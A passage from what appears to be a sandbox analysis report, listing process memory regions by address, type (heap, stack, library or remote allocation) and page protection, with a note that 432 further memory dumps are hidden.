page execute and read and write
|
||
|
208E3110000
|
trusted library allocation
|
page read and write
|
||
|
208E4B38000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E4D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E6C8000
|
trusted library allocation
|
page read and write
|
||
|
208E31D6000
|
heap
|
page execute and read and write
|
||
|
1D7868EC000
|
heap
|
page read and write
|
||
|
57C000
|
stack
|
page read and write
|
||
|
1C465490000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E590000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E3F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D7887FD000
|
heap
|
page read and write
|
||
|
208E4B85000
|
trusted library allocation
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
7FFE7E600000
|
trusted library allocation
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
208E3652000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E500000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1D786A30000
|
heap
|
page read and write
|
||
|
1C4677A7000
|
trusted library allocation
|
page read and write
|
||
|
1D788733000
|
heap
|
page read and write
|
||
|
1D788733000
|
heap
|
page read and write
|
||
|
7FFE7E5F0000
|
trusted library allocation
|
page read and write
|
||
|
1C47F320000
|
heap
|
page read and write
|
||
|
280C000
|
stack
|
page read and write
|
||
|
1D7887F1000
|
heap
|
page read and write
|
||
|
1D788A89000
|
heap
|
page read and write
|
||
|
1BCE7F000
|
stack
|
page read and write
|
||
|
1C467664000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E4D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E670000
|
trusted library allocation
|
page read and write
|
||
|
EA72D7E000
|
stack
|
page read and write
|
||
|
1D788A69000
|
heap
|
page read and write
|
||
|
7FFE7E6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E5A0000
|
trusted library allocation
|
page read and write
|
||
|
1BCFFE000
|
stack
|
page read and write
|
||
|
1D786860000
|
heap
|
page read and write
|
||
|
EA7327E000
|
stack
|
page read and write
|
||
|
1D788A66000
|
heap
|
page read and write
|
||
|
1D788848000
|
heap
|
page read and write
|
||
|
7FFE7E32C000
|
trusted library allocation
|
page read and write
|
||
|
1D786904000
|
heap
|
page read and write
|
||
|
27CF000
|
stack
|
page read and write
|
||
|
1D788AAE000
|
heap
|
page read and write
|
||
|
1BD3FE000
|
stack
|
page read and write
|
||
|
1C4673F8000
|
trusted library allocation
|
page read and write
|
||
|
1C467217000
|
heap
|
page read and write
|
||
|
1D788A94000
|
heap
|
page read and write
|
||
|
7FFE7E416000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C467303000
|
trusted library allocation
|
page read and write
|
||
|
208E3AA3000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E6A0000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
stack
|
page read and write
|
||
|
DAF000
|
stack
|
page read and write
|
||
|
7FFE7E630000
|
trusted library allocation
|
page read and write
|
||
|
1D78875D000
|
heap
|
page read and write
|
||
|
208E3140000
|
heap
|
page readonly
|
||
|
208FB6A0000
|
heap
|
page read and write
|
||
|
7FFE7E5D0000
|
trusted library allocation
|
page read and write
|
||
|
208E3431000
|
trusted library allocation
|
page read and write
|
||
|
1D788818000
|
heap
|
page read and write
|
||
|
1D788AAE000
|
heap
|
page read and write
|
||
|
208E3182000
|
trusted library allocation
|
page read and write
|
||
|
208E31D0000
|
heap
|
page execute and read and write
|
||
|
1D78883D000
|
heap
|
page read and write
|
||
|
1BCA83000
|
stack
|
page read and write
|
||
|
208E4CD8000
|
trusted library allocation
|
page read and write
|
||
|
1D788969000
|
heap
|
page read and write
|
||
|
1C465248000
|
heap
|
page read and write
|
||
|
1C4652AE000
|
heap
|
page read and write
|
||
|
1D788972000
|
heap
|
page read and write
|
||
|
1D7889E0000
|
heap
|
page read and write
|
||
|
1D786A70000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
1D78685D000
|
heap
|
page read and write
|
||
|
7FFE7E333000
|
trusted library allocation
|
page execute and read and write
|
||
|
208E4B33000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E4B0000
|
trusted library allocation
|
page read and write
|
||
|
1D788960000
|
heap
|
page read and write
|
||
|
8CF1AFE000
|
stack
|
page read and write
|
||
|
208E3838000
|
trusted library allocation
|
page read and write
|
||
|
1D788964000
|
heap
|
page read and write
|
||
|
7FFE7E680000
|
trusted library allocation
|
page read and write
|
||
|
1C467281000
|
heap
|
page read and write
|
||
|
EA72E7E000
|
stack
|
page read and write
|
||
|
7FFE7E430000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C47F428000
|
heap
|
page read and write
|
||
|
1D78880D000
|
heap
|
page read and write
|
||
|
1C46727F000
|
heap
|
page read and write
|
There are 432 hidden memdumps, click here to show them.